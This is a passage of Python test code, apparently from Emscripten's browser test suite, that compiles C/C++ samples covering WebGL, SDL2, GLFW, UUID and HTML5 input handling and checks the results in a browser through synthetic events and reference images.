self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high-quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues don't get minified out.
self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(test_file('uuid', 'test.js'))
try_delete(test_file('uuid', 'test.js.map'))
# Now run test in browser
self.btest(test_file('uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
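# The scenario under test: a balanced addRunDependency/removeRunDependency
# pair inside preRun must not trigger a second run() (the "doublestart" of
# the test name); the test expects the C side to report a single start.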
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure=1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],),
'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0'],)
})
@requires_threads
def test_html5_core(self, opts):
self.btest(test_file('test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
print(opts)
self.btest(test_file('test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS']]:
print(opts)
self.btest(test_file('webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context on Module.canvas when no ID has been explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(test_file('webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context on Module.canvas when no ID has been explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(test_file('browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
# Tests calling glGetString(GL_UNMASKED_VENDOR_WEBGL).
def test_webgl_unmasked_vendor_webgl(self):
self.btest(test_file('webgl_unmasked_vendor_webgl.c'), args=['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure=1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
# Tests the WebGL 2 glGetBufferSubData() functionality.
@requires_graphics_hardware
def test_webgl2_get_buffer_sub_data(self):
self.btest(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS'], expected='0')
def test_webgl2_objects(self):
self.btest(test_file('webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
['-s', 'OFFSCREEN_FRAMEBUFFER', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest(test_file('html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')
def test_webgl2_ubos(self):
self.btest(test_file('webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(test_file('webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support both WebGL1 and WebGL2, and WebGL2RenderingContext
# exists but WebGL2 context creation fails, we can then manually try to
# create a WebGL1 context and succeed.
self.btest(test_file('test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(test_file('webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure=1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types work
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(test_file('webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(test_file('third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(test_file('third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(test_file('third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_wget(self):
create_file('test.txt', 'emscripten')
self.btest(test_file('test_wget.c'), expected='1', args=['-s', 'ASYNCIFY'])
def test_wget_data(self):
create_file('test.txt', 'emscripten')
self.btest(test_file('test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASYNCIFY'])
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
create_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
''')
create_file('data.txt', 'load me right before...')
create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
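# locateFile lets the page remap the URLs of the secondary files (.wasm,
# .html.mem, .data) that the generated JS fetches at startup; returning
# "sub/" + x redirects those requests into the sub/ directory created below.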
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP', '-s', 'ASSERTIONS', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
print(opts)
self.btest(test_file('glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also -O2 coverage for --preload-file and memory-init.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main,_one]'])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main,_one]', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure=1', '-g1', '-s', 'LEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rAFs (requestAnimationFrame callbacks) to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_file('test.html', html)
create_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(test_file('freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(test_file('third_party', 'notofont', 'NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2'])
@disabled('https://github.com/emscripten-core/emscripten/issues/13101')
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', args=['-s', 'USE_SDL=2', '-s', 'MAIN_MODULE'])
